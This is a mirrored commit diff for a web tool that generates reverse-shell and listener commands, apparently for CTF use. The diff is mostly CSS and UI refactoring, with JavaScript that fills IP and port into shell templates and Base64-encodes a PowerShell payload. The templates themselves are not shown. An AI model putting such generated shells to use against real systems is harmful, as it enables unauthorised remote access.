mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 19:06:09 +00:00
wip: adds more features, cleanup
This commit is contained in:
briskets
parent
84e9b31165
commit
f722d7de98
@ -67,3 +67,9 @@ h2 {
|
||||
.card-body {
|
||||
max-height: 40rem;
|
||||
}
|
||||
|
||||
.list-group-item.active,
|
||||
.list-group-item-action:focus,
|
||||
.list-group-item-action:hover {
|
||||
background-color: #375a7f;
|
||||
}
|
||||
2
css/dark-mode.min.css
vendored
2
css/dark-mode.min.css
vendored
@ -1 +1 @@
|
||||
.prompt-sign{position:absolute;top:25px;left:40px;pointer-events:none;font-size:1em}.highlighted-parameter{color:#c0c0ba;font-weight:700;font-size:1em}.highlighted-warning{color:red;font-weight:700}.custom-switch label{cursor:pointer;user-select:none}_:-ms-fullscreen,:root body{overflow-y:scroll}#listener-command{border:none!important;border-radius:5px;box-shadow:10px 10px 20px 0 rgba(0,0,0,.75)}#reverse-shell-command{border:none!important;border-radius:5px;box-shadow:10px 10px 20px 0 rgba(0,0,0,.75);background-color:#464646;max-height:20rem}.custom-select{background-color:#646464;color:#fff}.container{padding:10px;border-radius:20px;box-shadow:10px 0 20px 0 rgba(0,0,0,.75);height:100%!important}h2{color:#fff;text-align:center}.pre-wrap{white-space:pre-wrap}.card-body{max-height:40rem}
|
||||
.prompt-sign{position:absolute;top:25px;left:40px;pointer-events:none;font-size:1em}.highlighted-parameter{color:#c0c0ba;font-weight:700;font-size:1em}.highlighted-warning{color:red;font-weight:700}.custom-switch label{cursor:pointer;user-select:none}_:-ms-fullscreen,:root body{overflow-y:scroll}#listener-command{border:none!important;border-radius:5px;box-shadow:10px 10px 20px 0 rgba(0,0,0,.75)}#reverse-shell-command{border:none!important;border-radius:5px;box-shadow:10px 10px 20px 0 rgba(0,0,0,.75);background-color:#464646;max-height:20rem}.custom-select{background-color:#646464;color:#fff}.container{padding:10px;border-radius:20px;box-shadow:10px 0 20px 0 rgba(0,0,0,.75);height:100%!important}h2{color:#fff;text-align:center}.pre-wrap{white-space:pre-wrap}.card-body{max-height:40rem}.list-group-item-action:focus,.list-group-item-action:hover,.list-group-item.active{background-color:#375a7f}
|
||||
@ -101,6 +101,7 @@ Ain't got time for using CSS the right way. !important everything!
|
||||
}
|
||||
|
||||
[data-theme="light"] .list-group-item {
|
||||
background-color: #f1c6ce;
|
||||
color: #000;
|
||||
}
|
||||
|
||||
@ -132,8 +133,7 @@ color: #000 !important;
|
||||
color: black;
|
||||
}
|
||||
|
||||
[data-theme="light"] h2
|
||||
{
|
||||
[data-theme="light"] h2 {
|
||||
color: white;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
2
css/light-mode.min.css
vendored
2
css/light-mode.min.css
vendored
@ -1 +1 @@
|
||||
[data-theme=light]{background-color:pink!important}[data-theme=light] .card{background-color:#af8bad!important;color:#000}[data-theme=light] .bg-white{background-color:#ddd7d7!important}[data-theme=light] .bg-dark{background-color:#e7d4e0!important}[data-theme=light] .rainbow{text-shadow:2px 2px 4px #000;font-size:40px;-webkit-animation:rainbow 5s infinite;-ms-animation:rainbow 5s infinite;animation:rainbow 5s infinite;font-family:'Comic Mono'}[data-theme=light] .prompt-sign{position:absolute;top:25px;left:40px;pointer-events:none;font-size:1em;color:#2e3e86}[data-theme=light] .input-group-text{background-color:#f1c6ce;color:#000}[data-theme=light] .btn{background-color:#a56096;color:#000;border-color:#a56096}[data-theme=light] .highlighted-parameter{color:#7223b5;font-weight:700;font-size:1em}[data-theme=light] .highlighted-warning{color:red;font-weight:700}[data-theme=light] .custom-switch label{cursor:pointer;user-select:none}[data-theme=light] .custom-control-input:checked~.custom-control-label::before{background-color:#7223b5}[data-theme=light] #listener-command{border:none!important;border-radius:5px;box-shadow:10px 10px 20px 0 rgba(153,28,143,.75);background-color:#2d8b87;color:#000}[data-theme=light] #reverse-shell-command{border:none!important;border-radius:5px;box-shadow:10px 10px 20px 0 rgba(153,28,143,.75);background-color:#2d8b87;color:#000;max-height:20rem}[data-theme=light] .custom-select{background-color:#f1c6ce;color:#000;border-color:#a56096}[data-theme=light] .custom-control-input:checked{color:#000}[data-theme=light] a{background-color:#f1c6ce;color:#000}[data-theme=light] .list-group-item{color:#000}[data-theme=light] .list-group-item.active{background-color:#a56096;border-color:#000}[data-theme=light] .list-group-item:hover{background-color:#a56096}[data-theme=light] .list-group-item.hover{background-color:rgba(153,28,143,.75)}[data-theme=light] .container{padding:10px;border-radius:20px;box-shadow:10px 0 20px 0 rgba(153,28,143,.75);max-height:1000px}[data-theme=light] .card-title{color:#000!important}[data-theme=light] .custom-control-label{color:#000}[data-theme=light] h2{color:#fff;text-align:center}[data-theme=light] .pre-wrap{white-space:pre-wrap}[data-theme=light] .card-body{max-height:40rem}@font-face{font-family:"Comic Mono";src:url(../assets/ComicMono.ttf)}@-webkit-keyframes rainbow{0%{color:orange}10%{color:purple}20%{color:red}30%{color:#5f9ea0}40%{color:#ff0}50%{color:coral}60%{color:green}70%{color:#0ff}80%{color:#ff1493}90%{color:#1e90ff}100%{color:orange}}@-ms-keyframes rainbow{0%{color:orange}10%{color:purple}20%{color:red}30%{color:#5f9ea0}40%{color:#ff0}50%{color:coral}60%{color:green}70%{color:#0ff}80%{color:#ff1493}90%{color:#1e90ff}100%{color:orange}}@keyframes rainbow{0%{color:orange}10%{color:purple}20%{color:red}30%{color:#5f9ea0}40%{color:#ff0}50%{color:coral}60%{color:green}70%{color:#0ff}80%{color:#ff1493}90%{color:#1e90ff}100%{color:orange}}
|
||||
[data-theme=light]{background-color:pink!important}[data-theme=light] .card{background-color:#af8bad!important;color:#000}[data-theme=light] .bg-white{background-color:#ddd7d7!important}[data-theme=light] .bg-dark{background-color:#e7d4e0!important}[data-theme=light] .rainbow{text-shadow:2px 2px 4px #000;font-size:40px;-webkit-animation:rainbow 5s infinite;-ms-animation:rainbow 5s infinite;animation:rainbow 5s infinite;font-family:'Comic Mono'}[data-theme=light] .prompt-sign{position:absolute;top:25px;left:40px;pointer-events:none;font-size:1em;color:#2e3e86}[data-theme=light] .input-group-text{background-color:#f1c6ce;color:#000}[data-theme=light] .btn{background-color:#a56096;color:#000;border-color:#a56096}[data-theme=light] .highlighted-parameter{color:#7223b5;font-weight:700;font-size:1em}[data-theme=light] .highlighted-warning{color:red;font-weight:700}[data-theme=light] .custom-switch label{cursor:pointer;user-select:none}[data-theme=light] .custom-control-input:checked~.custom-control-label::before{background-color:#7223b5}[data-theme=light] #listener-command{border:none!important;border-radius:5px;box-shadow:10px 10px 20px 0 rgba(153,28,143,.75);background-color:#2d8b87;color:#000}[data-theme=light] #reverse-shell-command{border:none!important;border-radius:5px;box-shadow:10px 10px 20px 0 rgba(153,28,143,.75);background-color:#2d8b87;color:#000;max-height:20rem}[data-theme=light] .custom-select{background-color:#f1c6ce;color:#000;border-color:#a56096}[data-theme=light] .custom-control-input:checked{color:#000}[data-theme=light] a{background-color:#f1c6ce;color:#000}[data-theme=light] .list-group-item{background-color:#f1c6ce;color:#000}[data-theme=light] .list-group-item.active{background-color:#a56096;border-color:#000}[data-theme=light] .list-group-item:hover{background-color:#a56096}[data-theme=light] .list-group-item.hover{background-color:rgba(153,28,143,.75)}[data-theme=light] .container{padding:10px;border-radius:20px;box-shadow:10px 0 20px 0 rgba(153,28,143,.75);max-height:1000px}[data-theme=light] .card-title{color:#000!important}[data-theme=light] .custom-control-label{color:#000}[data-theme=light] h2{color:#fff;text-align:center}[data-theme=light] .pre-wrap{white-space:pre-wrap}[data-theme=light] .card-body{max-height:40rem}@font-face{font-family:"Comic Mono";src:url(../assets/ComicMono.ttf)}@-webkit-keyframes rainbow{0%{color:orange}10%{color:purple}20%{color:red}30%{color:#5f9ea0}40%{color:#ff0}50%{color:coral}60%{color:green}70%{color:#0ff}80%{color:#ff1493}90%{color:#1e90ff}100%{color:orange}}@-ms-keyframes rainbow{0%{color:orange}10%{color:purple}20%{color:red}30%{color:#5f9ea0}40%{color:#ff0}50%{color:coral}60%{color:green}70%{color:#0ff}80%{color:#ff1493}90%{color:#1e90ff}100%{color:orange}}@keyframes rainbow{0%{color:orange}10%{color:purple}20%{color:red}30%{color:#5f9ea0}40%{color:#ff0}50%{color:coral}60%{color:green}70%{color:#0ff}80%{color:#ff1493}90%{color:#1e90ff}100%{color:orange}}
|
||||
385
index.html
385
index.html
@ -12,7 +12,8 @@
|
||||
<script src="assets/bootstrap-4.5.2.min.js"></script>
|
||||
<link rel="stylesheet" href="css/dark-mode.min.css">
|
||||
<link rel="stylesheet" href="css/light-mode.min.css">
|
||||
<meta name="description" content="Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTF's)"/>
|
||||
<meta name="description"
|
||||
content="Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs)" />
|
||||
</head>
|
||||
|
||||
<body class="bg-black">
|
||||
@ -32,14 +33,15 @@
|
||||
|
||||
<div class="row">
|
||||
|
||||
<!-- Configuration -->
|
||||
<!-- IP & Port Configuration -->
|
||||
<div class="col-12 col-md-6 mb-4">
|
||||
<div class="card shadow h-100">
|
||||
<div class="card-body">
|
||||
<h5 class="card-title mb-0">
|
||||
<b>Configuration</b>
|
||||
<b>IP & Port</b>
|
||||
</h5>
|
||||
|
||||
<!-- card-text -->
|
||||
<div class="card-text h-100">
|
||||
<form class="row justify-content-center align-items-center h-100">
|
||||
|
||||
@ -50,7 +52,7 @@
|
||||
<span id="ip-label" class="input-group-text">IP</span>
|
||||
</div>
|
||||
<input id="ip" type="text" class="form-control form-control-lg text-center px-1"
|
||||
size="11" maxlength="15" placeholder="10.10.10.10" aria-label="IP"
|
||||
size="12VW" maxlength="15" placeholder="10.10.10.10" aria-label="IP"
|
||||
aria-describedby="ip-label">
|
||||
</div>
|
||||
</div>
|
||||
@ -62,11 +64,11 @@
|
||||
<span id="port-label" class="input-group-text">Port</span>
|
||||
</div>
|
||||
<input id="port" type="text" class="form-control form-control-lg text-center"
|
||||
size="4" maxlength="5" placeholder="9001" aria-label="Port"
|
||||
size="4vw" maxlength="5" placeholder="9001" aria-label="Port"
|
||||
aria-describedby="port-label">
|
||||
<div class="input-group-append">
|
||||
<button id="inc-port" class="btn btn-secondary btn-sm" type="button"
|
||||
style="font-size: 12px" data-toggle="tooltip"
|
||||
style="font-size: 1rem" data-toggle="tooltip"
|
||||
title="Increase port number by one">
|
||||
+1
|
||||
</button>
|
||||
@ -87,7 +89,7 @@
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<!-- /Configuration -->
|
||||
<!-- /IP & Port Configuration -->
|
||||
|
||||
<!-- Listener -->
|
||||
<div class="col-12 col-md-6 mb-4">
|
||||
@ -109,7 +111,7 @@
|
||||
|
||||
<!-- Command -->
|
||||
<div class="row justify-content-center">
|
||||
<div class="col-auto position-relative" style="min-width: 300px">
|
||||
<div class="col-auto position-relative" style="min-width: 15vw">
|
||||
<pre class="prompt-sign">🚀</pre>
|
||||
<pre id="listener-command" class="bg-dark border text-wrap text-break p-4 pl-5 mb-2"
|
||||
style="outline: none; font-size:1em;" contenteditable="true"></pre>
|
||||
@ -141,20 +143,89 @@
|
||||
|
||||
</div>
|
||||
|
||||
<!-- <ul class="nav nav-tabs">
|
||||
<li class="nav-item dropdown">
|
||||
<a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false">OS Type</a>
|
||||
<select class="dropdown-menu" id="os-options">
|
||||
<option class="dropdown-item active" value="linux">Linux</option>
|
||||
<option class="dropdown-item" value="windows">Windows</option>
|
||||
<option class="dropdown-item" value="mac">Mac</option>
|
||||
</select>
|
||||
</li>
|
||||
</ul> -->
|
||||
<div class="row">
|
||||
<label for="os-options" class="col-auto col-form-label">OS</label>
|
||||
<div class="col-auto">
|
||||
<select id="os-options" class="custom-select">
|
||||
<option class="os-item" value="all">All</option>
|
||||
<option class="os-item" value="linux">Linux</option>
|
||||
<option class="os-item" value="windows">Windows</option>
|
||||
<option class="os-item" value="mac">Mac</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- NEW -->
|
||||
<ul class="nav nav-tabs" id="myTab" role="tablist">
|
||||
<li class="nav-item">
|
||||
<a class="nav-link active" id="home-tab" data-toggle="tab" href="#home" role="tab" aria-controls="home"
|
||||
aria-selected="true">Reverse</a>
|
||||
</li>
|
||||
<li class="nav-item">
|
||||
<a class="nav-link" id="profile-tab" data-toggle="tab" href="#profile" role="tab"
|
||||
aria-controls="profile" aria-selected="false">Bind</a>
|
||||
</li>
|
||||
<li class="nav-item">
|
||||
<a class="nav-link" id="messages-tab" data-toggle="tab" href="#messages" role="tab"
|
||||
aria-controls="messages" aria-selected="false">MSFVenom</a>
|
||||
</li>
|
||||
<li class="nav-item">
|
||||
<a class="nav-link" id="settings-tab" data-toggle="tab" href="#settings" role="tab"
|
||||
aria-controls="settings" aria-selected="false">Settings</a>
|
||||
</li>
|
||||
</ul>
|
||||
|
||||
<div class="tab-content">
|
||||
<div class="tab-pane active" id="home" role="tabpanel" aria-labelledby="home-tab">
|
||||
<!-- Reverse Shell -->
|
||||
<div class="card shadow mb-5">
|
||||
<div class="card-body">
|
||||
|
||||
<!-- Advanced switch -->
|
||||
<!-- Show all advanced switch -->
|
||||
<div class="custom-control custom-switch float-right">
|
||||
<input id="revshell-advanced-switch" type="checkbox" class="custom-control-input" checked>
|
||||
<label for="revshell-advanced-switch" class="custom-control-label small pr-2 pb-1"
|
||||
style="padding-top:2px" data-toggle="tooltip" title="Display advanced settings">
|
||||
Advanced
|
||||
style="padding-top:2px" data-toggle="tooltip" title="Display all advanced settings">
|
||||
Show all
|
||||
</label>
|
||||
</div>
|
||||
|
||||
<h5 class="card-title"><b>Reverse shell</b></h5>
|
||||
<!-- Upgrade Switch -->
|
||||
<div class="custom-control custom-switch float-right">
|
||||
<input id="upgrade-advanced-switch" type="checkbox"
|
||||
class="custom-control-input" checked>
|
||||
<label for="upgrade-advanced-switch"
|
||||
class="custom-control-label small pr-2 pb-1" style="padding-top:2px"
|
||||
data-toggle="tooltip" title="Display Upgrade Tips">
|
||||
Upgrade
|
||||
</label>
|
||||
</div>
|
||||
<!-- /Upgrade Switch -->
|
||||
|
||||
<!-- Encoder Switch -->
|
||||
<div class="custom-control custom-switch float-right">
|
||||
<input id="encoder-advanced-switch" type="checkbox"
|
||||
class="custom-control-input" checked>
|
||||
<label for="encoder-advanced-switch"
|
||||
class="custom-control-label small pr-2 pb-1" style="padding-top:2px"
|
||||
data-toggle="tooltip" title="Display Encode Options">
|
||||
Encode
|
||||
</label>
|
||||
</div>
|
||||
<!-- /Encoder Switch -->
|
||||
|
||||
<h5 class="card-title float-left"><b>Type</b></h5>
|
||||
</br>
|
||||
|
||||
<div class="card-text mt-4">
|
||||
<div class="row">
|
||||
@ -174,7 +245,8 @@
|
||||
<div class="row flex-grow-1">
|
||||
<div class="col position-relative">
|
||||
<pre class="prompt-sign">🚀</pre>
|
||||
<pre id="reverse-shell-command" class="bg-dark border pre-wrap text-break p-4 pl-5"
|
||||
<pre id="reverse-shell-command"
|
||||
class="bg-dark border pre-wrap text-break p-4 pl-5"
|
||||
style="outline: none; font-size:1em;" contenteditable="true"></pre>
|
||||
</div>
|
||||
</div>
|
||||
@ -209,17 +281,6 @@
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Upgrader -->
|
||||
<!-- <div class="col-auto mr-3">
|
||||
<div class="row">
|
||||
<label for="upgrades" class="col-auto col-form-label">Upgrade</label>
|
||||
<div class="col-auto">
|
||||
<select id="upgrades" class="custom-select">
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
</div> -->
|
||||
|
||||
</form>
|
||||
<!-- /Advanced section -->
|
||||
|
||||
@ -227,13 +288,14 @@
|
||||
<!-- Auto-copy switch -->
|
||||
<div class="custom-control custom-switch mt-2 mr-3" data-toggle="tooltip"
|
||||
title="Auto-copy to clipboard when selecting a new shell type">
|
||||
<input id="auto-copy-switch" class="custom-control-input" type="checkbox" checked>
|
||||
<input id="auto-copy-switch" class="custom-control-input" type="checkbox"
|
||||
checked>
|
||||
<label for="auto-copy-switch" class="custom-control-label small pr-2 pb-1"
|
||||
style="padding-top: 2px">Auto-copy</label>
|
||||
</div>
|
||||
<!-- Copy button -->
|
||||
<button id="copy-reverse-shell-command" data-toggle="tooltip" title="Copy to clipboard"
|
||||
type="button" class="btn btn-primary float-right">
|
||||
<button id="copy-reverse-shell-command" data-toggle="tooltip"
|
||||
title="Copy to clipboard" type="button" class="btn btn-primary float-right">
|
||||
Copy
|
||||
</button>
|
||||
</div>
|
||||
@ -248,9 +310,20 @@
|
||||
</div>
|
||||
</div>
|
||||
<!-- /Reverse Shell -->
|
||||
|
||||
</div>
|
||||
|
||||
<div class="tab-pane" id="profile" role="tabpanel" aria-labelledby="profile-tab">...</div>
|
||||
<div class="tab-pane" id="messages" role="tabpanel" aria-labelledby="messages-tab">...</div>
|
||||
<div class="tab-pane" id="settings" role="tabpanel" aria-labelledby="settings-tab">...</div>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
$(function () {
|
||||
$('#myTab li:first-child a').tab('show')
|
||||
})
|
||||
</script>
|
||||
<!-- /NEW -->
|
||||
</div>
|
||||
|
||||
<!-- Toasts -->
|
||||
<div id="clipboard-toast" class="toast position-fixed text-white" data-delay="1200"
|
||||
@ -272,14 +345,40 @@
|
||||
|
||||
<!-- RSG logic -->
|
||||
<script>
|
||||
// Element selectors
|
||||
const ipInput = document.querySelector("#ip");
|
||||
const portInput = document.querySelector("#port");
|
||||
const listenerSelect = document.querySelector("#listener-selection");
|
||||
const shellSelect = document.querySelector("#shell");
|
||||
const autoCopySwitch = document.querySelector("#auto-copy-switch");
|
||||
const encodingSelect = document.querySelector('#encoding');
|
||||
const listenerCommand = document.querySelector("#listener-command");
|
||||
const reverseShellCommand = document.querySelector("#reverse-shell-command");
|
||||
|
||||
document.querySelector("#os-options").addEventListener("change", (event) => {
|
||||
const selectedOS = event.target.value;
|
||||
const data = rsgData.commands;
|
||||
|
||||
const filteredItems = data.filter(item => {
|
||||
if (selectedOS !== "all") {
|
||||
return item.meta.includes(selectedOS)
|
||||
} else {
|
||||
return data;
|
||||
}
|
||||
});
|
||||
|
||||
document.querySelector("#reverse-shell-selection").innerHTML = "";
|
||||
rsg.initReverseShellSelection(filteredItems);
|
||||
});
|
||||
|
||||
const rsg = {
|
||||
currentCommandType: 'Bash -i',
|
||||
|
||||
copyToClipboard: function (text) {
|
||||
if (navigator.clipboard && navigator.clipboard.writeText) {
|
||||
copyToClipboard: (text) => {
|
||||
if (navigator?.clipboard?.writeText) {
|
||||
navigator.clipboard.writeText(text)
|
||||
$('#clipboard-toast').toast('show')
|
||||
} else if (window.clipboardData && window.clipboardData.setData) {
|
||||
} else if (window?.clipboardData?.setData) {
|
||||
window.clipboardData.setData('Text', text);
|
||||
$('#clipboard-toast').toast('show')
|
||||
} else {
|
||||
@ -287,151 +386,151 @@
|
||||
}
|
||||
},
|
||||
|
||||
escapeHTML: function (text) {
|
||||
return String(text).replace(/</, '<').replace(/>/, '>')
|
||||
},
|
||||
escapeHTML: (text) => String(text).replace(/</, '<').replace(/>/, '>'),
|
||||
|
||||
getIP: function () {
|
||||
return $('#ip').val() || $('#ip').attr('placeholder')
|
||||
},
|
||||
getIP: () => ipInput.value || ipInput.getAttribute('placeholder'),
|
||||
|
||||
getPort: function () {
|
||||
return Number($('#port').val() || $('#port').attr('placeholder'))
|
||||
},
|
||||
getPort: () => Number(portInput.value || portInput.getAttribute('placeholder')),
|
||||
|
||||
getReverseShellCommand: function () {
|
||||
const reverseShellData = rsgData.reverseShellsCommands.filter(function (reverseShellData) {
|
||||
return reverseShellData[0] === rsg.currentCommandType
|
||||
})[0]
|
||||
getReverseShellCommand: () => {
|
||||
const reverseShellData = rsgData.reverseShellsCommands.filter((reverseShellData) => reverseShellData[0] === rsg.currentCommandType)[0];
|
||||
return reverseShellData[1]
|
||||
},
|
||||
|
||||
highlightParameters: function (text, encoder) {
|
||||
const parameters = ['{ip}', '{port}', '{shell}', encodeURI('{ip}'), encodeURI('{port}'),
|
||||
encodeURI('{shell}')
|
||||
]
|
||||
parameters.forEach(function (param) {
|
||||
highlightParameters: (text, encoder) => {
|
||||
const parameters = ['{ip}', '{port}', '{shell}', encodeURI('{ip}'), encodeURI('{port}'), encodeURI('{shell}')];
|
||||
|
||||
parameters.forEach((param) => {
|
||||
if (encoder) param = encoder(param)
|
||||
text = text.replace(param, '<span class="highlighted-parameter">' + param +
|
||||
'</span>')
|
||||
text = text.replace(param, `<span class="highlighted-parameter">${param}</span>`)
|
||||
})
|
||||
return text
|
||||
},
|
||||
|
||||
init: function () {
|
||||
init: () => {
|
||||
rsg.initListenerSelection()
|
||||
rsg.initShells()
|
||||
rsg.initReverseShellSelection()
|
||||
// rsg.initUpgrader()
|
||||
},
|
||||
|
||||
initListenerSelection: function () {
|
||||
rsgData.listenerCommands.forEach(function (listenerData, i) {
|
||||
const type = listenerData[0],
|
||||
command = listenerData[1]
|
||||
$('#listener-selection').append($('<option>', {
|
||||
text: type,
|
||||
value: command,
|
||||
selected: i === 0,
|
||||
class: 'listener-option',
|
||||
}))
|
||||
initListenerSelection: () => {
|
||||
rsgData.listenerCommands.forEach((listenerData, i) => {
|
||||
const type = listenerData[0];
|
||||
const command = listenerData[1];
|
||||
|
||||
const option = document.createElement("option");
|
||||
|
||||
option.value = command;
|
||||
option.selected = i === 0;
|
||||
option.classList.add("listener-option");
|
||||
option.innerText = type;
|
||||
|
||||
listenerSelect.appendChild(option);
|
||||
})
|
||||
},
|
||||
|
||||
initShells: function () {
|
||||
rsgData.shells.forEach(function (shell, i) {
|
||||
$('#shell').append($('<option>', {
|
||||
text: shell,
|
||||
selected: i === 0,
|
||||
class: 'shell-option',
|
||||
}))
|
||||
initShells: () => {
|
||||
rsgData.shells.forEach((shell, i) => {
|
||||
const option = document.createElement("option");
|
||||
|
||||
option.selected = i === 0;
|
||||
option.classList.add("shell-option");
|
||||
option.innerText = shell;
|
||||
|
||||
shellSelect.appendChild(option);
|
||||
})
|
||||
},
|
||||
|
||||
// initUpgrader: function () {
|
||||
// rsgData.upgrades.forEach(function (upgrades, i) {
|
||||
// $('#upgrades').append($('<option>', {
|
||||
// text: upgrades,
|
||||
// selected: i === 0
|
||||
// }))
|
||||
// initUpgrader: () => {
|
||||
// rsgData.upgrade.forEach((upgrade, i) => {
|
||||
// const option = document.createElement("option");
|
||||
|
||||
// option.selected = i === 0;
|
||||
// option.innerText = upgrade;
|
||||
|
||||
// document.querySelector('#upgrade').appendChild(option);
|
||||
// })
|
||||
// },
|
||||
|
||||
initReverseShellSelection: function () {
|
||||
rsgData.reverseShellsCommands.forEach(function (reverseShellData) {
|
||||
const type = reverseShellData[0]
|
||||
const selectionEntry = $('<a>', {
|
||||
href: '#',
|
||||
text: type,
|
||||
'class': 'list-group-item',
|
||||
click: function (event) {
|
||||
rsg.currentCommandType = type
|
||||
rsg.updateReverseShellSelection()
|
||||
rsg.updateReverseShellCommand()
|
||||
if ($('#auto-copy-switch').prop('checked')) {
|
||||
rsg.copyToClipboard($('#reverse-shell-command').text())
|
||||
}
|
||||
event.preventDefault()
|
||||
}
|
||||
})
|
||||
setTimeout(function () { // fix strange IE behavior
|
||||
selectionEntry.addClass('list-group-item-action')
|
||||
}, 0)
|
||||
initReverseShellSelection: (items = rsgData.commands) => {
|
||||
items.map((item, index) => {
|
||||
const { name, command } = item;
|
||||
|
||||
$('#reverse-shell-selection').append(selectionEntry)
|
||||
const selectionButton = document.createElement("button");
|
||||
|
||||
if (index === 0) {
|
||||
selectionButton.classList.add("active");
|
||||
rsg.currentCommandType = name;
|
||||
rsg.updateReverseShellCommand();
|
||||
}
|
||||
|
||||
const clickEvent = () => {
|
||||
rsg.currentCommandType = name;
|
||||
rsg.updateReverseShellSelection();
|
||||
rsg.updateReverseShellCommand();
|
||||
|
||||
if (document.querySelector('#auto-copy-switch').checked) {
|
||||
rsg.copyToClipboard(reverseShellCommand.innerText)
|
||||
}
|
||||
}
|
||||
|
||||
selectionButton.innerText = name;
|
||||
selectionButton.classList.add("list-group-item", "list-group-item-action");
|
||||
selectionButton.addEventListener("click", clickEvent);
|
||||
|
||||
document.querySelector("#reverse-shell-selection").appendChild(selectionButton);
|
||||
})
|
||||
},
|
||||
|
||||
insertParameters: function (command, encoder) {
|
||||
insertParameters: (command, encoder) => {
|
||||
return command
|
||||
.replace(encoder('{ip}'), rsg.escapeHTML(encoder(rsg.getIP())))
|
||||
.replace(encoder('{port}'), encoder(String(rsg.getPort())))
|
||||
.replace(encoder('{shell}'), encoder($('#shell').val()))
|
||||
.replace(encoder('{shell}'), encoder(shellSelect.value))
|
||||
},
|
||||
|
||||
update: function () {
|
||||
update: () => {
|
||||
rsg.updateListenerCommand()
|
||||
rsg.updateReverseShellSelection()
|
||||
rsg.updateReverseShellCommand()
|
||||
},
|
||||
|
||||
updateListenerCommand: function () {
|
||||
let command = $('#listener-selection').val()
|
||||
updateListenerCommand: () => {
|
||||
const privilegeWarning = document.querySelector("#port-privileges-warning");
|
||||
let command = listenerSelect.value;
|
||||
command = rsg.highlightParameters(command)
|
||||
command = command.replace('{port}', rsg.getPort())
|
||||
|
||||
if (rsg.getPort() < 1024) {
|
||||
$('#port-privileges-warning').css('visibility', 'visible')
|
||||
command = '<span class="highlighted-warning">sudo</span> ' + command
|
||||
privilegeWarning.style.visibility = "visible";
|
||||
command = `<span class="highlighted-warning">sudo</span> ${command}`
|
||||
} else {
|
||||
$('#port-privileges-warning').css('visibility', 'hidden')
|
||||
privilegeWarning.style.visibility = "hidden";
|
||||
}
|
||||
|
||||
$('#listener-command').html(command)
|
||||
listenerCommand.innerHTML = command;
|
||||
},
|
||||
|
||||
updateReverseShellSelection: function () {
|
||||
console.log(rsg.currentCommandType)
|
||||
$('.list-group-item.active').removeClass('active')
|
||||
$('.list-group-item').filter(function () {
|
||||
return $(this).text() === rsg.currentCommandType
|
||||
}).addClass('active')
|
||||
updateReverseShellSelection: () => {
|
||||
document.querySelector(".list-group-item.active")?.classList.remove("active");
|
||||
const elements = Array.from(document.querySelectorAll(".list-group-item"));
|
||||
const selectedElement = elements.find((item) => item.innerText === rsg.currentCommandType);
|
||||
selectedElement?.classList.add("active");
|
||||
},
|
||||
|
||||
updateReverseShellCommand: function () {
|
||||
updateReverseShellCommand: () => {
|
||||
let command
|
||||
|
||||
if (rsg.currentCommandType === 'PowerShell #3 (Base64)') {
|
||||
const encoder = function (text) {
|
||||
return text
|
||||
}
|
||||
const encoder = (text) => text;
|
||||
const payload = rsg.insertParameters(rsgData.specialCommands['PowerShell payload'], encoder)
|
||||
command = "powershell -e " + btoa(payload)
|
||||
} else {
|
||||
command = rsg.getReverseShellCommand()
|
||||
}
|
||||
|
||||
const encoding = $('#encoding').val()
|
||||
const encoding = encodingSelect.value;
|
||||
if (encoding === 'Base64') {
|
||||
command = btoa(command)
|
||||
} else {
|
||||
@ -447,10 +546,10 @@
|
||||
)
|
||||
}
|
||||
|
||||
$('#reverse-shell-command').html(command)
|
||||
reverseShellCommand.innerHTML = command;
|
||||
},
|
||||
|
||||
updateSwitchStates: function () {
|
||||
updateSwitchStates: () => {
|
||||
$('#listener-advanced').collapse($('#listener-advanced-switch').prop('checked') ? 'show' :
|
||||
'hide')
|
||||
$('#revshell-advanced').collapse($('#revshell-advanced-switch').prop('checked') ? 'show' :
|
||||
@ -459,39 +558,44 @@
|
||||
}
|
||||
|
||||
/*
|
||||
* Event handlers
|
||||
* Init
|
||||
*/
|
||||
$('#shell, #encoding').on('change', function()
|
||||
{
|
||||
rsg.init();
|
||||
rsg.update();
|
||||
|
||||
/*
|
||||
* Event handlers/functions
|
||||
*/
|
||||
const dropdownUpdate = () => {
|
||||
rsg.updateReverseShellCommand();
|
||||
setLocalStorage(shellSelect, "shell", "value");
|
||||
})
|
||||
}
|
||||
|
||||
$('#inc-port').on('click', function () {
|
||||
$('#port').val(rsg.getPort() + 1);
|
||||
shellSelect.addEventListener("change", dropdownUpdate);
|
||||
encodingSelect.addEventListener("change", dropdownUpdate);
|
||||
|
||||
document.querySelector('#inc-port').addEventListener('click', () => {
|
||||
portInput.val(rsg.getPort() + 1);
|
||||
rsg.update();
|
||||
setLocalStorage(portInput, "port", "value");
|
||||
})
|
||||
|
||||
$('#listener-advanced-switch, #revshell-advanced-switch').on('change', rsg.updateSwitchStates)
|
||||
document.querySelector('#listener-advanced-switch').addEventListener('change', rsg.updateSwitchStates);
|
||||
document.querySelector('#revshell-advanced-switch').addEventListener('change', rsg.updateSwitchStates);
|
||||
|
||||
setInterval(rsg.updateSwitchStates, 500) // fix switch changes in rapid succession
|
||||
|
||||
$('#copy-listener').on('click', function () {
|
||||
rsg.copyToClipboard($('#listener-command').text())
|
||||
document.querySelector('#copy-listener').addEventListener('click', () => {
|
||||
rsg.copyToClipboard(listenerCommand.innerText)
|
||||
})
|
||||
|
||||
$('#copy-reverse-shell-command').on('click', function () {
|
||||
rsg.copyToClipboard($('#reverse-shell-command').text())
|
||||
document.querySelector('#copy-reverse-shell-command').addEventListener('click', () => {
|
||||
rsg.copyToClipboard(reverseShellCommand.innerText)
|
||||
})
|
||||
|
||||
/*
|
||||
* LocalStorage setting/getting
|
||||
*/
|
||||
const listenerSelect = document.querySelector("#listener-selection");
|
||||
const ipInput = document.querySelector("#ip");
|
||||
const portInput = document.querySelector("#port");
|
||||
const shellSelect = document.querySelector("#shell");
|
||||
const autoCopySwitch = document.querySelector("#auto-copy-switch");
|
||||
|
||||
/**
|
||||
* Sets item to localStorage when user moves focus from element
|
||||
@ -585,19 +689,16 @@
